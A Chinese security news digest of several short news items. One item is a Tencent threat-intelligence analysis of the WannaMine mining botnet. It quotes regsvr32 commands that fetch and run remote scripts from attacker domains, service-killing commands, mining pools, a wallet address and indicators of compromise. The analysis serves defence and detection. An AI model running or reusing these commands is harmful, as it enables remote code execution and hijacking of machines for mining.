安全快讯Top News

报告显示 WannaCry 依然是最让人头疼的勒索软件

Precise Security公布的一份新报告显示,WannaCry在去年勒索软件感染排行榜当中位居第一。Precise Security称,超过23.5%的设备最终被勒索软件锁定,其中垃圾邮件和网络钓鱼邮件仍然是去年最常见的感染源。不少于67%的勒索软件感染是通过电子邮件传递的,缺乏网络安全培训和薄弱的密码和访问管理是导致电脑在攻击后被加密的主要原因。 这份报告显示,针对政府机构,医疗保健,能源部门和教育的勒索软件攻击数量继续增加。一些简单的勒索软件以难以逆转的方式锁定系统,但更高级的恶意软件利用了一种称为加密病毒勒索的技术进行攻击。 WannaCry勒索软件爆发发生在2017年5月,当时第一批Windows电脑通过一个名为EternalBlue的NSA漏洞被感染。微软很快发布了补丁来阻止这一漏洞,包括不受支持的Windows XP操作系统,但目前仍有许多用户在使用没有打过补丁的设备。 与其他勒索软件感染一样,WannaCry对存储在设备上的文件进行加密,并要求用户支付解密密钥的费用。WannaCry攻击者要求受害者以比特币支付,据统计,它在全球造成了约40亿美元的损失。 WannaCry制造了一系列引人注目的受害者,包括英国的NHS系统,其设备运行的是未修补的Windows,主要是Windows XP。修补设备并保持安全软件完全更新,是阻止WannaCry攻击的最简单方法,同时不要打开来自不受信任来源的消息和文件。   (稿源:cnBeta,封面源自网络。)

TikTok 旧版曝光多个安全漏洞 请尽快升级至最新版

目前TikTok全球注册用户数量突破15亿,月活跃用户数量超过7亿,如此庞大的用户群自然也成为了黑客攻击的目标。根据安全公司Check Point发布的最新警告,TikTok的某些版本非常容易受到各种方式的攻击,严重的可能会破坏和窃取存储在手机的个人信息。 Check Point表示,这款时下热门的短视频应用程序中存在多个漏洞,攻击者能够相对容易地控制你的账户,上传或者删除视频,甚至能够公开用户设置为隐藏的视频。这些漏洞于去年11月被发现,Android和iOS端的TikTok都受到影响,不过在最新版本中已经得到修复。 其中一个漏洞是TikTok允许用户通过SMS信息来接受下载链接,而这条信息可以通过官网发起请求。但是这种机制并不完美,因为研究人员找到了一种操纵文本并修改SMS信息中链接的方式,以将特殊命令发送到应用程序(如果已在手机上安装的话)。此外,他们可以使用此漏洞将消息发送到任何电话号码,而不仅仅是用于注册TikTok帐户的电话号码。 随后, 攻击者可以利用浏览器重定向设置中的BUG来控制你的账户,并获取你电子邮件等相关个人信息,甚至可以公开你的私人视频。通过一些更精细的JavaScript代码向导,攻击者甚至可以创建视频并将其发布到第三方帐户中。 Check Point表示,在去年11月反馈了TikTok安全问题之后,字节跳动迅速做出调整在去年12月份发布的新版本中已经修复了这些漏洞。   (稿源:cnBeta,封面源自网络。)

谷歌 Project Zero 团队宣布新政策 漏洞披露前将有完整的90天缓冲期

谷歌 Project Zero 团队以披露大量严重漏洞而被人们所熟知,但也因为严格的快速披露政策而遭到了行业内的批评。于是 2020 年的时候,谷歌安全团队试图制定新的政策,将问题披露的宽限期给足了整整 90 天。即便如此,谷歌还是对过去五年的政策表现感到满意,指出有 97.9% 的漏洞报告在当前的 90 天披露政策下得到了有效的修复。 相比之下,2014 年有些 bug 拖了六个月、甚至更长的时间来解决。不过在审查了“复杂且经常引起争议”的漏洞披露政策之后,谷歌还是决定在 2020 年做出一些改变。 那些易被曝光漏洞的企业,将被给予默认 90 天的缓冲时间,而无论其将于何时修复相关 bug 。若企业顺利或提前完成了修复,也可以与谷歌 Project Zero 取得联系,以提前公布漏洞详情。 ● 厂家在 20 天内修复了 bug?谷歌将在第90天公布漏洞详情; ● 厂家在 90 天内修复了 bug?谷歌也将在第 90 天公布漏洞详情! 当然,在争取推动“更快的补丁开发”流程的同时,Project Zero 还希望全面提升补丁程序的采用率。 现有政策下,谷歌希望供应商能够快速开发补丁,并制定适当的流程,以将之交付给最终客户,我们将继续紧迫地追求这一点。 然而有太多次,供应商只是简单的记录了漏洞,而不考修改或从根本上修复已曝光的漏洞。有鉴于此,Project Zero 团队希望推动更快的补丁开发,以防别有用心者轻易地向用户发动大大小小的攻击。 改进后的新政策指出,发现漏洞之后,最终用户的安全性不会就此得到改善,直到 bug 得到适当的修复。只有最终用户意识到相关 bug,并在他们的设备上实施了修补,才能够从漏洞修复中得到益处。 最后,在新政策转入“长期实施”之前,Google 将给予 12 个月的试用。   (稿源:cnBeta,封面源自网络。)

黑客谎称微软遭受伊朗网络攻击进行邮件钓鱼

黑客正试图利用伊朗最近可能发动网络攻击的警告,来搜集Microsoft登录凭据进行网络欺诈。由于美国和伊朗之间关系日渐紧张,美国政府就伊朗可能会对重要基础设施发起网络攻击发出警告。在这样的局势下,一名攻击者谎称自己源于“Microsoft MSA”并发送了主题为“电子邮件用户受到伊朗网络攻击”的邮件,谎称微软服务器受到了来自伊朗的网络攻击来进行网络欺诈。 仿冒邮件还写到:为了应对这一攻击,微软会将邮件和数据锁定在服务器上以此保护用户免受伤害,若想要再次获得锁定用户的数据访问权,用户需要重新登录。 关于进行网络欺诈的电子邮件 据收到该钓鱼邮件的用户Michael Gillett说:他发现该邮件能够绕过Outlook的垃圾邮件过滤器,到达收件人的邮箱中。 以下是邮件内容 Cyber Attack 我们的服务器今天遭到伊朗政府的网络攻击,为了确保您的网络安全,我们不得不采取额外措施来保护您的帐户和个人数据。 一些电子邮件和文件可能会被锁定,为了您的账户安全,您需要再次登录账户。如果您在接收电子邮件时仍有问题,请耐心等待,我们的技术支持团队正在加紧处理,会尽快恢复数据。 Restore Data 如果收件人点击“还原数据”按钮,则会返回到仿冒的Microsoft登录页面,但从URL可以看到,这并不是一个合法的Microsoft站点。 伪造的Microsoft登录页面 如果用户输入登录凭证,用户信息将会被攻击者盗取被进行其他方面的网络攻击,而这些攻击可能包括:有针对性的网络欺诈、凭证填充攻击,数据盗窃。 因此,在这里提醒用户:当收到奇怪电子邮件,要求登录账户执行某项操作时,需要保持警惕,有问题可以联系网络或邮件账户管理员。此外,用户还要注意检查包含Microsoft登录表单在内的任何登录页面的URL,而合法的登录表单会在Microsoft.com、live.com和outlook.com域上进行公布。   消息来源:bleepingcomputer, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

挖矿资源争夺加剧,WannaMine 多种手法驱赶竞争者

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/GGD563kHbxrvt-XRitjUbQ 一、背景 腾讯安全御见威胁情报中心检测到WannaMine挖矿僵尸网络再度更新,WannaMine最早于2017年底被发现,主要采用Powershell“无文件”攻击组成挖矿僵尸网络。更新后的WannaMine具有更强的传播性,会采用多种手法清理、阻止竞争木马的挖矿行为,同时安装远控木马完全控制中毒系统。 本次更新后的WannaMine病毒具有以下特点: 利用“永恒之蓝”漏洞攻击传播; 利用mimiktaz抓取域登录密码结合WMI的远程执行功能在内网横向移动; 通过添加IP策略阻止本机连接对手木马的47个矿池,阻止其他病毒通过“永恒之蓝”漏洞入侵; 添加计划任务,WMI事件消费者进行持久化攻击,删除“MyKings”病毒的WMI后门; 利用COM组件注册程序regsvr32执行恶意脚本; 利用WMIClass存取恶意代码; 在感染机器下载Gh0st远控木马conhernece.exe和门罗币挖矿木马steam.exe。 二、详细分析 WannaMine安装计划任务进行持久化,计划任务名:’Microsoft\Windows\MUI\LMRemove’, ‘Microsoft\Windows\Multimedia\SystemEventService’,执行以下命令: regsvr32 /u /s /i:http://safe.lxb.monster/networks.xsl scrobj.dll regsvr32 /u /s /i:http://skt.xiaojiji.nl/networks.xsl scrobj.dll Regsvr32.exe是一个命令行程序,用于在Windows系统上注册和注销对象链接和嵌入控件,包括动态链接库(DLL),Regsvr32.exe可用于执行任意二进制文件。由于regsvr32.exe支持网络代理,因此可以通过在调用期间将统一资源定位符(URL)作为参数传递外部Web服务器上的文件来加载脚本。 在计划任务执行时,恶意脚本networks.xsl被Regsvr32.exe执行。networks.xsl实际上使用XML语言描述,其中被嵌入了一段JScript脚本,功能为通过CMD命令执行一段加密的Powershell代码。 两段Powershell代码解码后如下: 分别从http[:]//skt.xiaojiji.nl/networks.ps1和 http[:]//safe.dashabi.nl/networks.ps1下载得到文件networks.ps1。networks.ps1经过加密的Powershell脚本,也是是核心攻击代码。代码首先中定义了三个变量$miiiiii ,$fffffff,$ssssssss来分别保存加密数据,然后继续执行,后续代码中会读取并解密变量中的数据。 变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头,这段字符在Powershell的混淆代码中较为常见,功能等同于Powershell命令中的“IEX”(Invoke-Expression),IEX用于将字符串作为命令执行,当去掉IEX后,执行后就会显示原本的字符串。 我们将这段字符替换为自定义输出命令“write-host”,即可得到解码后的Powershell代码。 核心Powershell删除竞争对手安装的WMI后门代码,包括属于MyKings僵尸网络的“fuckyoumm3” ,“fuckyoumm4”,”fuckyoumm”,“fuckamm3”后门,以及属于未知团伙的“BotFilter82“,“BotConsumer23”,” BotFilter82”后门。 然后通过以下代码安装WMI事件消费者,其中事件过滤器名$filterName = (‘Windows Events Filter’),事件消费者名$consumerName = (‘Windows Events Consumer’)。当捕获到指定的事件发生时执行恶意代码”$EncodedScript”,达到持久化攻击的目的。 对比2019年4月WannaMine代码可以发现基础设施已发生变化: 旧版: 备用服务器地址:profetestruec.net、45.199.154.108、172.247.116.87 默认下载地址:172.247.116.8 默认端口:8000 核心Powershell:in6.ps1,in3.ps1 新版: 备用服务器地址:safe.dashabi.nl、45.77.148.102、skt.xiaojiji.nl 默认下载地址:skt.xiaojiji.nl 默认端口:80 核心Powershell:network.ps1 申请一个名为“root\default:System_Anti_Virus_Core “的WMI对象,将变量中的数据保存到WMIClass当中以备后续使用。 接着从变量$fffffff中获取代码$defun执行。 $defun中函数Download_file()负责下载文件并保持到temp目录下。 RunDDOS()负责启动DDOS进程。 RunXMR()负责启动门罗币挖矿进程。 KillBot()负责清除竞争对手,杀死进程命令行包含字符“System_Anti_Virus_Core “,”cryptonight “的进程,同时杀死使用端口3333、5555、7777进行TCP通信的进程。 实现了“永恒之蓝“漏洞攻击代码,攻击函数为eb7()、eb8()。、 Get-IpInB()函数从网卡配置信息中获取IP地址,取A段和B段作为IP地址开头,然后随机生成C段和D段组成待攻击的IP地址列表。 在Test-Port()中测试IP地址是否开放445端口,在Get-creds()中通过密码抓取工具mimiktaz获取当前域登录密码,得到Username、Domain、Password/NTLM数据并保存。 密码搜集工具mimiktaz由初始阶段定义的三个变量之一的$miiiiii解密获得。在Test-ip()中针对mimiktaz获取到域登录凭证的IP进行攻击,利用WMI的远程命令执行功能,调用Invoke-WmiMethod执行远程Powershell命令(64位执行 http[:]//safe.dashabi.nl/networks.ps1,32位执行http[:]//safe.dashabi.nl/netstat.ps1)。 核心Powershell利用“永恒之蓝“漏洞攻击工具进行攻击。首先调用[PingCastle.Scanners.m17sc]::Scan()进行漏洞扫描,将存在漏洞的IP保存至$i17中,然后调用攻击函数eb7()和eb8()进行攻击。 在目标系统执行shellcode命令$sc,该命令内容由之前的三个变量之一$ssssssss中解密得到,主要功能为判断WMI中是否存在root\Subscription -Class __FilterToConsumerBinding命名空间下的null对象或者不含“Windows Events Filter“字符的对象,如果是则执行远程恶意代码:http[:]//207.246.124.125/networks.ps1 RunDDOS(Gh0st远控木马) Networks.ps1中解码出$fffffff后,调用其函数RunDDOS ,指定参数”cohernece.exe”,从http[:]//safe.dashabi.nl/coherence.txt下载二进制数据,并还原成PE文件cohernece.exe到%Temp%目录下,通过start-process命令执行。 分析发现,该文件当前并非DDOS木马,而是Gh0st远控木马,当前使用的C&C地址为six.lxb.monster:8447。 Gh0st远控木马较为常见,技术分析从略。 RunXMR Networks.ps1中解码出$fffffff后,调用其函数RunXMR,指定参数”steam.exe”,从http[:]//safe.dashabi.nl/steam.txt下载二进制数据,并还原成PE文件steam.exe到%Temp%目录下,通过start-process命令执行。steam.exe为自解压程序,解压目录为c:\windows\fonts\Wbems\,解压结束后首先执行bat脚本c:\windows\fonts\Wbems\1.bat。 再次删除竞争对手的服务: sc stop “evemt windows” sc delete “evemt windows” sc stop “event log” sc delete “event log” sc stop ias sc delete ias sc stop FastUserSwitchingCompatibility sc delete FastUserSwitchingCompatibility sc stop MicrosoftMysql sc delete MicrosoftMysql 设置解压目录下的木马文件为隐藏、系统属性: attrib -a -s -h c:\windows\fonts\Wbems\*.exe 启动c:\windows\fonts\Wbems\ipp.exe,该文件也是Gh0st远控木马。 将解压出的病毒文件拷贝到目标目录下 netsh ipsec static importpolicy file=c:\windows\fonts\Wbems\close.ipsec,将木马释放的IP安全策略文件close.ipsec导入到当前机器。 close.ipsec通过配置IP筛选器,阻止本机向其他47个矿池IP地址发起的TCP网络连接,从而阻止竞品木马的挖矿行为。 阻止任何地址与本机的139/445端口的TCP或UDP通信,包括局域网和远程连接,从而阻止其他病毒通过“永恒之蓝”漏洞入侵。 通过SetACL.exe修复注册表”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator”的访问属性,并在该注册表下写入StartExe值,利用微软”The Ease of Access Center”(便捷访问中心)特性来启动木马uas.exe。 然后通过服务管理程序msdtc,将挖矿木马xx.exe安装为服务”Event Logs”并启动服务。设置服务的DisplayName和Description值如下: DisplayName “USO Services” Description “Manages profiles and accounts on a SharedPC configured device” 挖矿程序xx.exe采用XMRig 5.4.0版本编译,支持CPU和NVIDIA CUDA显卡GPU挖矿(4.5.0以后)。 使用以下矿池: xmr.wulifang.nl:80 91.121.140.167:443 hash.wulifang.nl:80 131.153.76.130:443 xme.wulifang.nl:13531 47.101.30.124:13531 fr.minexmr.com:80 钱包: 44AVCF3zFkWLKYrXQ7A2L4MjWxhJNxzZZczD8N9LjEbE9PCwdjRg1iJ4oHedTxngSVKKV8H74ZDXgHoq9Wgt3cVkJn3eNbS 三、安全建议 根据该病毒的技术特点,我们建议企业采取以下措施加以防范: 使用安全的密码策略,切勿使用弱口令; 及时修复Windows系统漏洞,推荐使用腾讯御点、腾讯电脑管家、或Windows Update修补漏洞,亦可参考以下链接重点修复永恒之蓝相关漏洞;(1)MS17-010永恒之蓝漏洞补丁下载地址:(2)XP、WindowsServer2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598(3)Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的指定IP连接登陆; 对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器; 当系统出现异常时,检查计划任务和WMI(可用WMITools.exe)中是否有存在可疑脚本命令 推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.77.148.102 207.246.124.125 Domain safe.dashabi.nl safe.lxb.monster six.lxb.monster skt.xiaojiji.nl URL http[:]//safe.lxb.monster/networks.xsl http[:]//skt.xiaojiji.nl/networks.xsl http[:]//skt.xiaojiji.nl/networks.ps1 http[:]//safe.dashabi.nl/networks.ps1 http[:]//safe.dashabi.nl/netstat.ps1 http[:]//207.246.124.125/networks.ps1 http[:]//safe.dashabi.nl/coherence.txt http[:]//safe.dashabi.nl/steam.txt 参考链接: WannaMine挖矿木马更新基础设施 新手法已大赚17万 WannaMine挖矿木马再活跃,14万台linux系统受攻击

VPN 警告:REvil 勒索软件盯上未打补丁的 Pulse Secure VPN 服务器

使用REvil(Sodinokibi)勒索软件勒索大型组织的网络罪犯瞄准未打补丁的Pulse Secure VPN服务器,并禁用防病毒软件。 安全研究人员正在敦促使用Pulse Secure VPN的组织立即进行修补,否则将面临犯罪分子的“大规模”勒索软件攻击,这些犯罪分子可以轻松地使用Shodan.io IoT搜索引擎来识别易受攻击的VPN服务器。 上个月,在纳斯达克上市的美国数据中心提供商CyrusOne遭到REvil(Sodinokibi)勒索软件攻击,而去年夏天,美国的几个网络服务商、德克萨斯州的20多个地方政府机构以及400多个牙医诊所也相继遭到了网络攻击。 由于犯罪分子利用该勒索软件来加密关键业务系统,并要求巨额赎金解密,英国安全研究员凯文·博蒙特将REvil归为“big game”类别,该勒索软件病毒株于去年4月被发现,主要是使用Oracle WebLogic中的漏洞来感染系统。 去年10月,美国CISA、美国国家安全局联合英国国家网络安全中心发布的警告称:REvil瞄准的Pulse secure VPN服务器还未打补丁。此前有证据显示,政府支持的黑客正在利用Pulse Secure 以及Fortinet VPN产品中的漏洞,由于该漏洞已被网络犯罪分子广泛使用,因而波及范围也越来越广。 凯文·博蒙特指出:由于该服务器允许远程攻击者在没有有效凭据的情况下连接公司网络,同时禁用多种形式的身份验证,在这样的情况下以纯文本的形式远程查看包括活动目录和账户密码在内的日志和缓存密码,导致Pulse Secure VPN 漏洞情况越来越糟糕。上周发生的两起漏洞事件都采用了类似的手段:通过访问网络来获取域管理控制,然后使用开源VNC远程访问软件来访问移动网络。 在这样的流程后,所有安全端口都会被禁用,REvil(Sodinokibi)勒索软件会通过PsExec渗透到Windows远程管理系统中。网络安全公司Bad Packets 1月4日扫描数据显示:仍有3825台Pulse secure VPN服务器漏洞还未被修补,其中去年10月警报中所提到的CVE-2019-11510漏洞就包含其中,而1300多个易受攻击的漏洞VPN服务器均位于美国。   消息来源:zdnet, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

被发现监视用户的阿联酋社交应用 ToTok 在谷歌 Play Store 重新上架

据外媒报道,谷歌在12月曾下架阿联酋社交应用ToTok,然而现在这款聊天应用已在谷歌Play Store重新上架。当时《纽约时报》曾报道称,ToTok被认为是阿联酋政府的秘密监视工具,使它可以监视ToTok用户的位置、消息和社交关系。 “我们认真对待有关违反安全和隐私的报告。如果发现违反我们政策的行为,我们将采取行动。”一位谷歌发言人在一封电子邮件中告诉Motherboard。 《纽约时报》援引一位美国情报官员的话说,“ ToTok被阿联酋政府政府用来追踪用户的每一次谈话、动向、关系、约会、声音和图像。” 报告补充说,该应用程序在中东、欧洲、亚洲、非洲和北美拥有大量用户,Apple和Google应用程序商店被下载了数百万次。 在《纽约时报》接触谷歌和苹果的代表发表评论后,两家公司都在调查过程中将ToTok从其应用商店中删除。 在《纽约时报》发表文章的同一天,Motherboard通过恶意软件搜索引擎VirusTotal处理了ToTok Android应用程序。当时,没有杀毒软件公司将该应用标记为恶意。然而周一,ESET,Fortinet和Symantec 都将同一版本的应用程序标记为恶意。 在谷歌Play Store重新上架的ToTok版本是更新版本。在“新功能”部分下,ToTok应用程序页面显示为“有一个新设计的对话框,要求您授权访问和同步您的联系人列表。” Google最初下架该应用程序时,曾表示ToTok违反了未指定的政策。 “等待已经结束。我们很高兴地通知您,#ToTok现在可以在Google Play商店中下载了。感谢您的耐心等待。让我们联系!‬” ToTok 周日在其网站上的简短公告中写道。ToTok的共同研发者Giacomo Ziani在接受美联社的采访时为该应用程序辩护,并表示他不知道与他的项目相关的人们与阿联酋的情报有关。 当被问及是否会在自己的应用商店中重新上架该应用程序时,苹果公司没有立即回应置评请求。   (稿源:cnBeta,封面源自网络。)

谷歌 Chrome 恶意扩展窃取了价值 16000 美元的加密货币

一份报告显示,一个恶意的谷歌Chrome扩展程序成功进入Chrome网络商店,盗取了价值至少1.6万美元的加密货币。该扩展名为“ Ledge Secure”,声称可以用作Google Chrome浏览器中的一种加密货币钱包,从而以某种方式成功突破了Google的过滤器,最终被Chrome网络商店上架以供用户下载。 至少有一个用户确认安装了扩展程序后,自己的加密货币被盗了,目前尚不知道最终受害者的具体人数。Decrypt报告说,该扩展程序扫描了该设备,并将种子短语发送给该扩展程序的作者,这几乎可以使恶意行为者窃取任何加密货币。以Twitter用户“ hackedzec”为例,这个扩展造成600 ZEC币的损失,价值约16000美元。 法国Ledger公司在Twitter上证实了这个扩展不是一个合法的插件,并建议用户避免在自己的设备上安装它。目前此恶意扩展工作细节尚未透露,谷歌已经从Chrome网店中删除了这个扩展,建议所有安装它的人尽快检查钱包,确保没有密码被盗。   (稿源:cnBeta,封面源自网络。)

Facebook 向 Cambridge Analytica 泄露用户信息,被巴西政府罚款 165 万美元

巴西因Facebook与 Cambridge Analytica 共享用户数据而对Facebook罚款165万美元。 检察官称,Facebook允许应用程序“ This is Your Digital Life”的开发人员访问巴西443,000位用户的数据。 “ This is Your Digital Life ” 应用发布于2014年 ,由Global Science Research(GSR)研发。该应用向用户提供1或2美元以进行在线调查,并请求访问该用户的个人资料信息。超过270,000个用户同意进行授权,这使得该应用可以使用这些信息进行学术研究。 丑闻遭到曝光之后,Facebook“暂停”了与Cambridge Analytica(CA)及其控股公司的所有业务。 巴西当局还开始调查隐私丑闻,以确定其公民的参与。 周一,巴西代表表示,“没有证据表明巴西的用户数据已转移到Cambridge Analytica”。 Facebook的发言人说:“我们已经更改了平台,并限制了应用程序开发人员可以访问的信息。” 巴西司法部指出,这家社交网络巨头未能充分告知其用户“默认隐私设置的后果”。Facebook对于隐私设置对访问“朋友和朋友的数据”可能产生的后果并不透明。” Facebook可以在10天之内对该决定提出上诉,并且可以在一个月内支付罚款。 2019年7月,美国联邦贸易委员会(FTC)批准了与Cambridge Analytica丑闻有关的Facebook创纪录的50亿美元和解协议。 2019年7月,意大利数据保护监管机构因违反隐私法,对Facebook 处以 100万欧元(110万美元)的罚款。 2018年10月,英国信息专员办公室(ICO) 因为同样的原因对Facebook 罚款 500,000英镑。   消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

黑客攻破美国一政府网站 贴出特朗普被打流血图片

据外媒报道,黑客成功侵入美国一个政府网站,并在上面发布了一张美国总统唐纳德·特朗普脸被打嘴里流着血的图片。美国土安全局的一名官员证实,该网站隶属于联邦存储图书馆计划(FLDP),不过该图片现在已被撤下。 这个被攻击的网站向用户展示了一个黑色页面,其中包括特朗普被打的照片以及一条声称黑客组织是代表“伊朗伊斯兰共和国”行事的信息。 “我们不会停止支持我们在该地区的朋友:巴勒斯坦被压迫的人民、也门被压迫的人民、叙利亚人民和政府、伊拉克人民和政府、巴林被压迫的人民、黎巴嫩和巴勒斯坦真正的圣战者抵抗;(他们)总是得到我们的支持。”信息写道。 据了解,网站上的特朗普流血图跟最近导致Qassem Soleimani少将死亡的美国空袭有着直接的关系。 尽管该信息表明伊朗黑客是幕后黑手,但美国官员称在这方面还没有明确证据。“我们知道联邦存储图书馆计划(FDLP)的网站被亲伊朗、反美国的信息所破坏。目前还没有证据表明这是伊朗国家支持的行动者所为。(目前)该网站已被关闭,无法访问。CISA正在跟FDLP以及我们的联邦伙伴一起监控情况。”   (稿源:cnBeta,封面源自网络。)